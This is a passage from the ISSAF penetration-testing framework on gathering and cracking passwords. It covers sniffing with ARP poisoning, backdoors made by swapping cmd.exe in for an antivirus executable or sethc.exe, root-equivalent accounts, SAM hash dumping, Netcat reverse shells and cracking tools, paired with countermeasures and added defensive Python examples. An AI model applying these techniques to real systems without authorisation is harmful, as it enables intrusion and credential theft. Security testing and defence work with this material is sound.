hand or using appropriate tools like SolarWinds’ IP Network Browser). In this file the
administrator password for the router is stored either unencrypted, encrypted with the
old XOR cipher, or hashed with MD5. In the first 2 cases recovering it is easily feasible.
The sixth case depends on the existence of a finger server in the remote host. Then
issuing:
finger @hostname
will show all logged-in users, or whether there's no one logged in.
The seventh case implies reviewing the source code of HTML pages in search of
designer comments, passwords to connect to databases, etc.
There could be other cases in which passwords can be obtained remotely, not including
the use of Trojan horses, but trying to enumerate ALL particular cases can take forever.
If there is a login page of any kind, odds are that a brute-force attack can be launched
against it. This process is time consuming, generates a ton of logs if the security
administrator cares about them, and has a very low success ratio: only very simple
passwords (like 'password' or the userID as the password) will be found.
If there’s no possibility to grab passwords/hashes remotely, the only option is to find a
vulnerability that can be exploited to get access to an internal system. This process will
put us in the situation described in Step Two.
C.5.5 Result Analysis / Conclusion / Observation
If non required services like finger are disabled and/or firewalled, SNMP default
community names changed, Lotus Domino and/or Apache properly configured and
patched, HTML source code reviewed to remove any important information, and any
SQL aware web applications properly configured to sanitize user requests, it's almost
impossible to grab hold of passwords as a remote user with low privileges.
If any password authentication is exposed to the Internet, it is critical to audit the
passwords used to detect and force the change of the weak ones.
If passwords can be obtained, the strength of them will depend on the encryption
algorithm used and the quality of the password.
C.5.6 Countermeasure(s)
• Block ALL services that don't need external (Internet) access at the border firewall.
• Verify that all SQL aware web applications are not vulnerable to SQL injection.
• Verify that names.nsf in a Lotus Domino server can't be accessed remotely using
the anonymous account (it's better if it's not possible to do that at all).
• Verify that files starting with a dot can't be accessed remotely in Apache servers.
Also ensure that the .passwd file is outside the web root directory.
• Verify that all default community names have been changed. It's better to block
SNMP access from the Internet at the border firewall.
• Verify that all unused services (for example finger) have been deactivated and/or
blocked at the border firewall.
• Audit the source code of HTML pages to remove any compromising information.
• Audit all passwords used by Internet-exposed applications.
C.5.7 Further Reading (Links)
C.5.8 Contributor(s)
C.6 STEP TWO: NETWORK AUTHENTICATION CREDENTIALS GATHERING
AS AN INSIDER PENETRATION TESTER (LOW PRIVILEGE)
C.6.1 Description
Here the main concern is people with some kind of internal access, ranging from
visitors carrying a laptop with no accounts in the internal system to employees with a low
or entry level of access.
There’s no point in trying to do a penetration test if the privileges are already high,
because in this case the intruder will have access to almost anything. In this case refer
to Step Five.
C.6.2 Objective
Describe the process of obtaining different types of commonly used passwords, from the
perspective of an insider with low privileges in the system.
The password cracking once the encrypted or hashed passwords have been obtained is
described in a separate section.
C.6.3 Expected Results
Only in exceptional cases can the internal security of an organization cope with an
insider. It's very common practice to secure only the perimeter of the network, relying on
the use of passwords at the internal level.
In most cases the insider will be able to gather information from the network using
packet sniffers, including password exchanges that, even when encrypted, are good
candidates for future cracking.
C.6.4 Process (Steps to complete this task)
All the examples mentioned in Step One are valid, with the additional advantage that it's
very unlikely that the firewall(s) and ACL(s) are restricting access for internal personnel.
Being connected to the internal network, one of the best choices is to use a packet
sniffer to gather information from the network.
The issues to solve in order to use a sniffer are:
a) they need administrative privileges in order to put the NIC in promiscuous mode
b) the network will most likely be a switched environment; in order to capture
exchanges from/to machines other than the insider's, some extra techniques
have to be used
Point (a) is in fact the less restrictive of the two, because the insider can boot another OS like
Knoppix from a CD or a Linux mini-distribution from a floppy, thus having administrative
access and the needed tools available.
Point (b) can be overcome with the use of the "ARP poisoning" technique, which consists of
tampering with the ARP tables in the switches to redirect all traffic from/to a given host
(or all the network) to the insider's machine, capture it, and send it on to the real destination.
From the network captures the passwords, encrypted passwords, hashes, or
authentication exchanges can be isolated for future cracking.
C.6.5 Example uses of common testing tool(s)
One of the best multipurpose sniffers available is Ethereal (www.ethereal.com), available
for many OSs (Windows, UNIX and Linux versions are available), and as a GUI or CLI
application (in the latter case its name is tethereal).
Ethereal doesn't incorporate any functionality to do ARP poisoning to re-route traffic
through the attacker's system, so an external tool has to be used for that purpose.
Another interesting sniffer is Dsniff by Dug Song (www.monkey.org/~dugsong/dsniff/), which
incorporates both the possibility to do ARP poisoning and some pre-made filters to
capture some passwords.
If an external tool is needed to do ARP poisoning, Arp0c from Phenoelit
(www.phenoelit.de/arpoc/), the successor of WCI, is one of the best tools available.
In any case where ARP poisoning is required, it's important to verify that no loss of
connectivity was caused in the network. Some network switches provide the functionality
to stop all traffic if an attempt to do ARP poisoning is detected (basically, if a forceful
attempt to modify the cached ARP tables is detected from a different MAC address).
Very few networks incorporate this functionality, but it's important to be aware of it, and
to consider the possibility of using it within the organization.
Some switches can also be configured to avoid forceful changes to the cached ARP
tables, thus making ARP poisoning impossible. In such systems, a small packet flood
(DoS attack) can be tried against the switch, because such switches tend to fall back to
acting as simple repeaters (hubs) if they can't cope with the ARP table updating. As in the
paragraph above, it's important to verify that there is no loss of network connectivity.
C.6.6 Result Analysis / Conclusion / Observation
Seldom is a company's network not vulnerable to ARP spoofing, and very few of them
have sniffer detection in place, so for the insider trying to gather authentication
credentials from the network with the use of sniffers is one of the main ways of attack.
C.6.7 Countermeasure(s)
Implement internal firewalls to segregate network segments that don't require
interconnection.
Implement at least IP based ACLs (best if combined with user based ACLs) to avoid
spurious connections to systems in need of protection.
Use switched networks.
Try to implement that using switches that can be configured to avoid ARP poisoning as
much as possible (balance the equation: if someone attempts ARP poisoning this can
lead to major network connectivity disruption).
Use network sniffer detection tools, like AntiSniff (readily available on the Internet).
These tools are not 100% fail-proof (a one-way network tap will easily avoid them) but
it's better than nothing.
Disable the possibility to boot to an alternate operating system in the machines you
control (by changing the BIOS setup and protecting it with a password, or what is better,
by removing all bootable devices like floppy drive and CDROM reader). This way you
can still be attacked by someone who carries his/her own laptop, but this is easier to
avoid by physical access control to the facilities.
Always consider that someone inside your organization *can* get your authentication
credentials from the network, so try to minimize the impact using quality passwords and
good encryption.
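The countermeasures above rely on switches that refuse forced ARP changes and on sniffer detection tools; a cheap complement is to watch the ARP replies themselves, since poisoning shows up as one IP address being claimed by two MAC addresses, or as one MAC answering for several addresses (the gateway plus its victims). The monitor below is an added example written for this edition, not part of ISSAF or of the tools it names. It consumes (time, sender IP, sender MAC) observations, constructed inline here, which on a real network would come from a passive capture of ARP replies.

```python
from collections import defaultdict

# Constructed ARP reply observations: (seconds, sender IP, sender MAC).
# Rows 4 and 5 show a host (MAC ...:21) answering for the gateway and for
# a workstation; row 6 is the real gateway replying again (flip-flop).
SAMPLE_ARP = [
    (0.0,  "10.0.0.1",  "00:11:22:33:44:01"),   # gateway, legitimate
    (0.5,  "10.0.0.20", "00:11:22:33:44:20"),   # workstation, legitimate
    (1.0,  "10.0.0.21", "00:11:22:33:44:21"),   # another workstation
    (30.0, "10.0.0.1",  "00:11:22:33:44:21"),   # gateway IP claimed by .21's MAC
    (30.1, "10.0.0.20", "00:11:22:33:44:21"),   # .20 claimed by the same MAC
    (31.0, "10.0.0.1",  "00:11:22:33:44:01"),   # real gateway answers again
]


def detect_arp_anomalies(observations):
    """Replay ARP replies in order and return alerts as dicts.

    Two conditions are raised: an IP whose sender MAC differs from the one
    last seen for it, and a MAC that is currently the sender for more than
    one IP. A router doing proxy ARP legitimately triggers the second, so
    allow-list such hosts in production (assumption: none in the sample).
    """
    current = {}                    # ip -> MAC last seen claiming it
    alerts = []
    for ts, ip, mac in observations:
        mac = mac.lower()
        prev = current.get(ip)
        if prev is not None and prev != mac:
            alerts.append({"time": ts, "kind": "ip-mac-change",
                           "ip": ip, "old": prev, "new": mac})
        current[ip] = mac
        claimed = sorted(i for i, m in current.items() if m == mac)
        if len(claimed) > 1:
            alerts.append({"time": ts, "kind": "mac-claims-multiple-ips",
                           "mac": mac, "ips": claimed})
    return alerts


def conflicting_ips(observations):
    """IPs claimed by more than one MAC over the whole capture -> sorted MACs."""
    seen = defaultdict(set)
    for _, ip, mac in observations:
        seen[ip].add(mac.lower())
    return {ip: sorted(macs) for ip, macs in seen.items() if len(macs) > 1}


if __name__ == "__main__":
    for alert in detect_arp_anomalies(SAMPLE_ARP):
        print(alert)
    print("conflicting:", conflicting_ips(SAMPLE_ARP))
```

The flip-flop in the last row is the useful signal for triage: a legitimate replacement of a NIC changes an IP's MAC once, whereas a poisoned gateway address keeps alternating between the real and the impersonating MAC for as long as the attack runs, and the MAC that wins those alternations identifies the machine to pull off the network.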
C.6.8 Further Reading (Links)
C.6.9 Contributor(s)
C.7 STEP THREE: LOCAL HOST AUTHENTICATION CREDENTIALS
GATHERING AS AN INSIDER PENETRATION TESTER (LOW PRIVILEGE)
C.7.1 Description
In general, once someone has physical access to the local host the game is over,
because there are usually one or more ways to get all the information from the system.
This section applies mostly to employees who want to gather local authentication
credentials for some reason, but don't have any administrative rights for the local
machine.
C.7.2 Objective
Describe the process of obtaining different types of commonly used passwords from the
local machine, from the perspective of an insider with low privileges in the system.
Password cracking, once the encrypted or hashed passwords have been obtained, is
described in a separate section.
C.7.3 Expected Results
Any skilled individual should be able to raise his/her privileges in the local system to an
administrative level. After that, gathering local authentication credentials is very easy in
most cases.
C.7.4 Process (Steps to complete this task)
The first step to consider is checking if there are any stored passwords, usually obscured
by asterisks (or circles in Windows XP) that can be revealed using password reveal
tools.
Other than the above, the attacker can try to raise privileges to administrative
(Administrator, root, SYSTEM) level. This will vary depending on the operating system.
If everything else fails, the attacker can still try to exploit any local vulnerabilities
identified in the system.
C.7.5 Example uses of common testing tool(s)
For password revealing in Windows systems, tools like Revelation
(http://www.snadboy.com/) can prove useful, but my preferred one is VeoVeo, a Spanish
tool available at http://www.hackindex.org/download/veoveo.zip (the website is in
Spanish; I recommend reading it).
The tool needs no administrative privileges to be installed; just unzip it in any directory,
but be sure to have the .exe and the .dll in the same directory.
When started it will show in your tray (it's the leftmost icon, marked in red). It can be
accessed with the right mouse button, and you'll see the following options:
Visualizar Password
Activar Botones (manual)
Activar Botones (automatico)
Activar Menus
Activar Keylogger
Acerca de
Salir
"Visualizar Password" has the functionality to reveal passwords obscured by asterisks.
"Activar Botones (manual)" will send a single message to activate all greyed controls.
In some cases the program greys the controls again every 1/nth of a second, in that
case you can use "Activar Botones (automatico)" that will keep sending the message to
reactivate the greyed controls until deselected.
"Activar Menus", that doesn't work all the time or with all applications, activates greyed
menu items.
"Activar Keylogger" activates a simple keylogger. In the Spanish text that comes with
VeoVeo there's an explanation of that functionality.
"Acerca de" has the "About…" functionality.
"Salir" means "Exit". This closes the application.
If your problem is the nasty circles that obscure passwords in Windows XP, you can
give iOpus Password Recovery a try (http://www.iopus.com/password_recovery.htm).
The next step could be to escalate privileges on the system.
In most cases you can boot to an alternative OS, like a Knoppix CDROM, and just grab
important system files that can provide authentication credentials. Typical examples are
the /etc/secrets in a Linux system or the sam file in a Windows machine.
However, I have usually found it easier just to modify the system to allow me a backdoor
with administrative privileges.
If the system is a Windows box, it's very likely that it will be running an antivirus program;
the antivirus will typically have SYSTEM access rights in order to be able to scan all files
in the system.
With the system running, you can take note of the name of the antivirus program (i.e. the
process that's running), boot into an alternative OS that allows you to write to the local
system (like NTFSDOS Pro to access NTFS partitions), make a backup of the
executable of the antivirus and put a copy of cmd.exe with the same name and in the
same location as the old (replaced) antivirus executable.
Upon booting the system, instead of the antivirus a SYSTEM CLI will be started.
I also found it handy to apply this trick to sethc.exe on my Windows XP system with the
Accessibility Tools installed, thus having the possibility of starting a SYSTEM CLI before
login simply by pressing SHIFT five times (if you do it after login, the CLI will start within
your user account).
If the system is a Linux box, you can still create a bogus account with UID=0 (thus a root
equivalent), and su to that account after your normal login. You can put a pre-encrypted
password to that account if you want, or change it after su'ing. (All this can be a little
pointless in a Linux box if you're only interested in the /etc/secrets).
After gaining administrative access level, the next step in a Windows box can be to
dump hashes from the SAM; this can be done with tools like pwdump2 or pwdump4 in
local mode. Other tools exist for the same purpose.
If it's not possible to tamper with the system and no useful information was obtained by
password revealing, it's still possible to try to identify a local vulnerability and use the
proper exploit. An example of that could be RunAs from DebPloit. Take into account that
many of these exploits are detected as malware by most antivirus programs, so you
have to deactivate them first (I found it trivial to deactivate products like McAfee 4.x
using the "Activar Botones" functionality of VeoVeo. Just experiment a bit).
C.7.6 Result Analysis / Conclusion / Observation
Having local access to a system, even with low privileges, usually means that escalation
of privileges and authentication credentials gathering is possible.
C.7.7 Countermeasure(s)
Avoid at all costs the possibility of booting to an alternate operating system.
Provide antivirus and keep it up to date. Verify that it is not feasible to deactivate it with
tools such as VeoVeo.
Verify that any application that stores passwords and shows them hidden by asterisks or
circles is not storing the real password there, but a bogus character string.
C.7.8 Further Reading (Links)
C.7.9 Contributor(s)
C.8 STEP FOUR: NETWORK AUTHENTICATION CREDENTIALS GATHERING AS AN OUTSIDER ADMINISTRATOR (HIGH PRIVILEGE)
C.8.1 Description
In this scenario the "attacker" is most likely an auditor who already has some kind of
administrative access level to the remote system.
Except in the possible case of SSH connections, the administrative access is to some
kind of control or configuration tool (for servers, routers, etc.) that doesn't allow direct
command execution.
Due to the remote nature of the attack, the use of sniffers is not feasible.
C.8.2 Objective
To gather any available credentials for the remote control/configuration tool.
To obtain command execution rights in the remote system, in order to implement all the
techniques described so far.
Password cracking, once the encrypted or hashed passwords have been obtained, is
described in a separate section.
C.8.3 Expected Results
In the case where no command execution rights can be obtained, it's very likely that
authentication credentials for the control/configuration tool can be obtained, either by its
normal functionality or exploiting some bug of it or the underlying platform (for example
the web server).
If command execution rights can be obtained (or are readily available) in the remote
system, all techniques mentioned in the preceding sections can be applied, and at least
the local authentication credentials will be obtained.
C.8.4 Process (Steps to complete this task)
The process will vary depending on the type of remote access.
If it consists of SSH or similar access with command execution capabilities to the remote
system, for all purposes it can be considered local access with administrative privileges.
Dumping or copying of local authentication credentials, installation of sniffers, and other
techniques mentioned before will be applied.
If the only access available is to the CLI, and for some reason GUI access is needed,
VNC (Virtual Network Computing, from http://www.realvnc.com/) can be installed.
If the remote access consists of some control/configuration tool that has indirect
command execution capabilities like Webmin (http://www.webmin.com/), a shell can be
connected back to the attacker's system using Netcat, this process is called "Shell
Shovelling". The details of establishing such a connection are out of the scope of this
section (details to be found in the relevant section of ISSAF, or the Internet).
If the remote access doesn't provide any way to execute commands, the first step could
be to check if in its configuration the credentials for other accounts can be obtained. This
will depend on the specific configuration/control tool, but it's very unlikely that they will
disclose credentials, even to administrators that can change passwords and add/remove
users.
One possibility to explore is any known vulnerability in the configuration/control tool.
Dig SecurityFocus (http://www.securityfocus.com/) for those.
If there are no vulnerabilities shown in SecurityFocus, or the tool is not mentioned, some
basic tricks like trying to pass invalid parameters, wrong URLs (if the tool is web-based),
etc., can sometimes disclose some information from the system, like paths or the location
of components. If this is feasible, and knowing the internal details of the tool, it could be
possible to get access to any file or database where the authentication credentials are
stored.
In some strange cases, the above tricks allow command execution (for example pointing
an URL to the command to execute, see examples of command execution using the old
IIS Unicode vulnerability to get the idea).
As a side note, in some cases, if user creation rights are available and the encryption
used by the application is known, a bogus user can be created with a known password,
and a search carried out (as far as possible) for the encrypted string corresponding to that
password in order to locate the credentials storage.
C.8.5 Example uses of common testing tool(s)
Other than the tools to use after getting CLI access to the remote system, there are no
specific tools except the one(s) used to connect to the remote configuration/control
application.
In the case of web access to the application, it is sometimes useful to try some kind of
intercepting proxy like Achilles (Windows) or Paros
(http://www.proofsecure.com/index.shtml/ for Windows and Linux versions).
C.8.6 Result Analysis / Conclusion / Observation
Given the possibility of command execution, authentication credentials will be gathered
at least from the local system.
If no command execution is possible, it will still be possible in some cases to gather
some authentication credentials if the remote control/configuration application is not well
coded/configured.
C.8.7 Countermeasure(s)
Implement remote control/configuration applications only when they are really needed.
Try to use an application that doesn't allow command execution, or disable it if possible.
Implement a firewall (if possible) that allows connection to that application only from
selected locations.
If possible use certificates for authentication. If only passwords can be used, implement
a strong policy for secure passwords.
If One-Time-Passwords can be used, these are preferred to normal passwords.
Verify the integrity of the remote control/configuration application. It has to behave well
under error conditions, attempts to feed bogus data and/or hand crafted URLs (for web
based applications).
C.8.8 Further Reading (Links)
C.8.9 Contributor(s)
C.9 STEP FIVE: NETWORK AUTHENTICATION CREDENTIALS GATHERING AS AN INSIDER ADMINISTRATOR (HIGH PRIVILEGE)
C.9.1 Description
This scenario allows total control of the network at a LAN level.
Basically that means that the attacker or auditor can apply ALL techniques described
before (including network sniffer installation) to gather authentication credentials with a
very high success ratio.
C.9.2 Objective
To gather any available credentials from the network and servers.
Password cracking, once the encrypted or hashed passwords have been obtained, is
described in a separate section.
C.9.3 Expected Results
Since the attacker has administrative privileges at the enterprise level, nothing can stop
him/her from collecting all available authentication credentials, so special care has to be
taken to avoid storage of plain or encrypted authentication credentials.
C.9.4 Process (Steps to complete this task)
All the techniques described before.
C.9.5 Example uses of common testing tool(s)
See sections one to four.
C.9.6 Result Analysis / Conclusion / Observation
Credentials will be collected except in the following cases:
a) certificates are used for authentication (assuming that the Certification Authority
is safe from the attack)
b) one-time-passwords are in use (the credentials can still be gathered, but are
useless)
c) the authentication and/or encryption in use is not known. This will "protect" the
specific system/application only until the time this becomes public knowledge
C.9.7 Countermeasure(s)
All the countermeasures mentioned so far, with the following recommendations:
• Implement network encryption.
• Implement packet signing in Windows networks to avoid packet injection.
• Use certificates for authentication and be sure that the CA is not reachable on the
network (it should be totally offline, and any accounts there must be different from
the ones used in the enterprise network).
• Avoid security through obscurity (point c in the section "Results…" above), because
it will provide only temporary security. If it proves to be unsafe when the details
become public, many more resources will have to be spent than if a good secure
product had been chosen from the beginning.
C.9.8 Further Reading (Links)
C.9.9 Contributor(s)
C.10 STEP SIX: LOCAL HOST AUTHENTICATION CREDENTIALS GATHERING AS AN ADMINISTRATOR (HIGH PRIVILEGE)
C.10.1 Description
This case is for authentication credentials gathering on the local host, having
administrative privileges. Nothing can stop the attacker/auditor from gaining all the
available credentials on the system.
C.10.2 Objective
To gather any available credentials from the network and servers.
Password cracking, once the encrypted or hashed passwords have been obtained, is
described in a separate section.
C.10.3 Expected Results
Since the attacker has administrative privileges at the local host level, nothing can stop
him/her from collecting all available authentication credentials, so special care has to be
taken to avoid storage of plain or encrypted authentication credentials.
C.10.4 Process (Steps to complete this task)
See steps three and five. Nothing will stop you from using all techniques described so
far.
C.10.5 Example uses of common testing tool(s)
See all techniques and tools described above.
C.10.6 Result Analysis / Conclusion / Observation
Credentials will be collected except in the following cases:
a) certificates are used for authentication (assuming that the Certification Authority
is safe from the attack)
b) one-time-passwords are in use (the credentials can still be gathered, but are
useless)
c) the authentication and/or encryption in use is not known. This will "protect" the
specific system/application only until the time this becomes public knowledge
C.10.7 Countermeasure(s)
All the countermeasures mentioned so far, with the following recommendations:
• Implement some kind of hard disk or file encryption for critical information that
has to belong to a given user and that can't be overridden by the administrator. In
such cases it's vital to keep the credentials needed to decrypt the information
offline, or to use certificate-based encryption (with a secure CA).
• Use certificates for authentication and be sure that the CA is not reachable on the
network (it should be totally offline, and any accounts there must be different from
the ones used in the enterprise network).
• Avoid security through obscurity (point c in the section "Results…" of step five),
because it will provide only temporary security. If it proves to be unsafe when the
details become public, many more resources will have to be spent than if a good
secure product had been chosen from the beginning.
C.10.8 Further Reading (Links)
C.10.9 Contributor(s)
C.10.10 SECOND PART: ENCRYPTED/HASHED PASSWORD CRACKING
C.10.11 Background I: encrypting, hashing, salting
Encryption is the process of changing a plain text into a cipher text, and usually means
that the process can be reversed (if you apply all mathematical or logical operations in
reverse order you can obtain the plain text for a given cipher text).
Password crackers can implement decryption when encryption is in use and the
algorithm is known.
Hashing is the process of mathematically obtaining a digest from a given plain text, and
implies that it is mathematically infeasible to obtain the plain text for a given cipher text.
Password crackers overcome that difficulty by hashing a big set of plain text words or
sequences of characters, and comparing the hash obtained with the cipher text. When a
match is found the plain text password has been found, or at least another plain text that
produces the same hash (mathematically possible, but very hard). In this last case the
result is the same, the text obtained will work as the password.
Salting is the process of adding one or more random components to a given plain text
during the encryption or hashing process, thus making it more difficult to recover the
plain text by either of the ways described above.
If an algorithm doesn't incorporate salt, a given plain text will produce always the same
cipher text.
If an algorithm incorporates salt, a given plain text will produce several different cipher
text variants, depending on the randomness of the salt added.
A good example of the use of salt is Linux passwords.
In the past such passwords were encrypted using DES, and this was strong enough at
the time, but with the advent of more powerful systems the cracking of DES became
feasible, so a new algorithm was put in place by the shadow package in Linux
systems.
The new algorithm is a salted variation of MD5 (plus a small encoding at the end), so for
each plain text you can obtain 1024 (depending on the implementation) different cipher
texts.
Adding this complexity factor of 1024 to the fact that the encryption "per se" is stronger
(MD5) makes it much harder to "crack" (in fact, recover) Linux passwords.
The term "cracking" is incorrect in the case of hash recovery, but it's widely used.
C.10.12 Background II: algorithms, public and proprietary algorithms
As mentioned earlier in this chapter, many different encryption and hashing algorithms
are in use. It's important to know which algorithm has been used for a given password in
order to identify the proper cracking tool.
If you know from which application/system that cipher text came in the first place, usually
you can dig information about the algorithm used in the Internet or documentation of the
application/system itself.
Many such algorithms are described in RFC (Request For Comments) or STD
(STandarDs) documents (available at http://www.rfc-editor.org/).
If an algorithm has been published, scrutinized, and attacked for some time, and proven
solid, it's a good choice for our encryption.
If an algorithm is proprietary, we only have the vendor's claims about its security.
Until someone breaks it and people start to attack it massively, we don't know anything
about its real security. If there are public algorithms in use, those are preferred to
proprietary ones.
An example of a proprietary algorithm that was broken almost immediately after being
put in use, and proved to be weak, was the DVD encryption.
Another good example is the Domino R4 HTTP password hashing algorithm. Its "secret"
was closely guarded by Lotus until Jeff Fay and some collaborators managed to break it
(now it's implemented in Lepton's Crack). That algorithm produces an unsalted hash, so
a given plain text password always produces the same hash, speeding up the process
and making rainbow table creation attractive.
C.10.13 Background III: Rainbow Tables and Rainbow Cracking
A very long time ago someone came up with the concept of pre-computing the cipher
texts for all possible plain texts (for a given algorithm, of course). This way a table with
all plain texts and their corresponding cipher texts can be generated; such a table is
named a "Rainbow Table".
Having such a table you don't need to create hashes again during the password cracking
process; it's enough to parse the table looking for any given cipher text and, when found,
read the next column to see what plain text is associated with it. This process is
known as "Rainbow Cracking".
Rainbow table generation and rainbow cracking is feasible with today's hardware for
algorithms that don't use salt (due to storage space limitations for the table) and up to a
certain length only.
A good candidate for such approach is the old Windows LM algorithm, because it uses
only a subset of all ASCII characters (no lowercase letters, not all symbols allowed,
Unicode is possible but hardly used in western countries) with a maximum length of 7.
Even that "small" subset will produce a table of more than 100 GB, and will take weeks
to complete, but the rainbow cracking after table creation will take only a very small
percentage of that time to recover ANY password.
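To make the salting point of Background I and the precomputation point of Background III concrete, here is an added example (not part of ISSAF): with an unsalted hash, two accounts that share a password store the same digest, so one precomputed table serves against every account and shared passwords are visible without any cracking; with a per-user salt every stored value is unique. The PBKDF2 storage format, the iteration count and the sample accounts are this example's own assumptions.

```python
import base64
import hashlib
import hmac
import os
from collections import defaultdict

ITERATIONS = 100_000  # assumed work factor; raise it as hardware gets faster


def unsalted_digest(password):
    """Plain MD5 of the password, the kind of unsalted hash discussed above:
    the same password always gives the same digest, on every system."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def hash_password(password, salt=None):
    """Salted, iterated hash. The format is this example's own, not a standard:
    pbkdf2_sha256$<iterations>$<base64 salt>$<base64 digest>"""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt for every stored password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        ITERATIONS, base64.b64encode(salt).decode(), base64.b64encode(digest).decode())


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time; any
    malformed or foreign-scheme value is rejected rather than raising."""
    try:
        scheme, iterations, salt_b64, digest_b64 = stored.split("$")
        if scheme != "pbkdf2_sha256":
            return False
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(digest_b64)
        actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    except (ValueError, TypeError):
        return False
    return hmac.compare_digest(actual, expected)


def accounts_sharing_a_digest(records):
    """Audit helper: groups of users whose stored values are identical. With an
    unsalted algorithm this exposes shared passwords with no cracking at all;
    with per-user salt the grouping finds nothing, which is what salt buys."""
    by_digest = defaultdict(list)
    for user, stored in records.items():
        by_digest[stored].append(user)
    return sorted(users for users in by_digest.values() if len(users) > 1)


def demo():
    # Constructed sample accounts; "alice" and "bob" chose the same password.
    passwords = {"alice": "Winter2004", "bob": "Winter2004", "carol": "hunter2"}
    unsalted = {u: unsalted_digest(p) for u, p in passwords.items()}
    salted = {u: hash_password(p) for u, p in passwords.items()}
    return {
        "unsalted_shared": accounts_sharing_a_digest(unsalted),      # [['alice', 'bob']]
        "salted_shared": accounts_sharing_a_digest(salted),          # []
        "bob_verifies": verify_password("Winter2004", salted["bob"]),  # True
        "bob_wrong": verify_password("winter2004", salted["bob"]),     # False
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```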
C.10.14 Description
This section describes the process to identify (when possible) the encryption/hashing
algorithm used to secure the passwords, and the use of common password cracking
tools to obtain the plain text passwords.
C.10.15 Objective
To obtain the plain text passwords from their corresponding encrypted/hashed
equivalents.
To explain the use of common password cracking tools.
To explain the rainbow table concept and its implementation with common tools.
C.10.16 Expected Results
Due to the attack on the encrypted/hashed passwords being off-line, no particular
restrictions are expected to be found.
Given a known encryption/hashing algorithm, any simple passwords will fall to attack.
Complex passwords could potentially take a prohibitive time to be obtained, so the use
of rainbow tables will be explained for these.
In the end, it is expected that a good percentage of user passwords and some
administrative (probably good) passwords will be recovered.
C.10.17 Process (Steps to complete this task)
The steps to follow are:
• Select the proper password cracking tool based on the encryption/hashing
algorithm in use.
• Organize the combination userID + encrypted/hashed password in a format
suitable for the password cracking tool to be used.
• If rainbow tables are not available, use a comprehensive dictionary attack on the
encrypted/hashed password list.
• If rainbow tables are not available, define the scope of a bruteforce attack and
implement it.
• Do a rainbow table lookup for the encrypted/hashed passwords.
C.10.18 Example uses of common testing tool(s)
Some common password cracking tools are:
• LC5 (http://www.atstake.com/products/lc/)
  o Runs on Windows only
  o Supports LM and NTLM hashes (Windows), including rainbow tables.
  o Supports Unix hashes, but no rainbow table support for that.
  o Supports dictionary, "hybrid mode" and bruteforce attacks
  o Has rainbow table support
  o The charset to use for the password is configurable
  o It has network sniffing functionality and SAM dumping
  o Has some other enterprise related functionalities
  o The main advantages of this tool are the commercial support and the ease of use
• Cain (http://www.oxid.it/cain.html)
  o Runs on Windows only
  o Supports Win 9x .pwl files, Windows LM, NTLM and NTLMv2 hashes, Cisco IOS
    MD5 hashes, Cisco PIX MD5 hashes, APOP MD5 hashes, CRAM MD5 hashes, OSPF
    MD5 hashes, RIPv2 MD5 hashes, VRRP HMAC hashes, VNC 3DES passwords, pure MD2
    hashes, pure MD4 hashes, pure MD5 hashes, pure SHA1 hashes, RIPEMD-160 hashes,
    Kerberos 5 pre-authentication hashes, Radius Key hashes, IKE-PSK hashes, MS-SQL
    hashes and MySQL hashes
  o Supports dictionary and bruteforce attacks
  o Supports rainbow tables for some algorithms, and for a single account at a time
  o The charset to use for the password is configurable
  o It has network sniffing functionality and SAM dumping
  o Has several other functions other than password cracking
  o The main advantages of this tool are the huge amount of encrypted/hashed
    passwords supported, the extra functionalities not related to password cracking
    and the cost (free)
• John the Ripper (http://www.openwall.com/john/)
  o Runs on DOS, Windows and Linux (or any UNIX-ish system)
  o Supports traditional DES, BSDI DES, FreeBSD MD5, OpenBSD Blowfish, Kerberos AFS
    DES and Windows LM by default.
  o Patches are available to support OpenVMS passwords, Windows NTLM, AFS Kerberos
    v4, S/Key keyfiles, Netscape LDAP server passwords and MySQL passwords. Applying
    a single patch is easy; applying more than one gets more and more complex
    because you can't simply use the patch command.
  o Supports dictionary, "word mangling" and incremental (bruteforce) modes. These
    modes make John a very powerful tool
  o The charset to use for the password is configurable
  o The main advantages of this tool are bruteforce speed, the powerful word
    mangling mode and the fact that it is free open source software
• Lepton's Crack (http://freshmeat.net/projects/lcrack/)
  o Runs on DOS and Windows if compiled under Cygwin, MingW or Visual C, and Linux
    (or any UNIX-ish system)
  o Supports Domino R4 hashes, pure MD4 hashes, pure MD5 hashes, NTLM (Unicode
    MD4), pure SHA1 hashes and Windows LM hashes by default.
  o Plans are in place to add support for Domino R5 hashes and Oracle passwords.
  o Supports login mode (tries combinations of the userid), dictionary, "smart
    dictionary mode" and bruteforce attacks
  o It has REGEX support. This is one of the most interesting functionalities of
    this tool, and makes it very powerful
  o In REGEX mode (and also for the charset) the characters to use can be indicated
    directly by the character, or as a hex, octal or decimal number
  o The charset to use for the password is configurable
  o Both commonly used charsets and REGEX expressions can be stored in text files,
    and these referenced when the tool is used
  o Has an external program to generate rainbow tables for the supported algorithms
  o Has rainbow table support
  o The main advantages of this tool are the REGEX mode, support for Domino R4
    hashes and the fact that it is free open source software
There are plenty of other tools out there, some of them for several encryption/hashing
algorithms, some only for one. Every one of them has advantages and disadvantages,
so try them and get familiar with the most useful ones for you.
C.10.19 Use of LC5
LC5 is a commercial product you can purchase from AtStake.
They'll issue you a registration key.
The installation is the typical point-and-click one for Windows software. You need
administrative privileges to install the tool, but not to use it (except for network sniffing
and SAM dumping).
{FIXME: someone put examples of LC5, I haven't used LC for years!}
C.10.20 Use of Cain
Cain is a free product you can download from www.oxid.it
The installation is quite straightforward, you need administrative privileges to install the
tool and to use it (it refuses to start if you are a normal user).
Here is a screenshot of Cain, as shown when you start it and open the "Help"->"About…"
menu item:
Every section of the program is accessed with the tabs on top. There's a tab named
"Cracker" that will bring you to the password cracking section:
On the left side you have all the supported algorithms. If you select any, the right side of
the screen will adjust the columns to the ones relevant for that algorithm. In the example
above the columns for LM & NTLM hashes are shown.
If you click with the right mouse button on the right side of the screen, you'll get a floating
menu similar to this one (the particular one will depend on the algorithm selected on the
left):
In this example of LM & NTLM, the next step will be to "Add to list" some hashes.
This option brings up the following dialog:
It allows you to dump the local hashes or to import from a text or SAM file.
If dumping the local hashes:
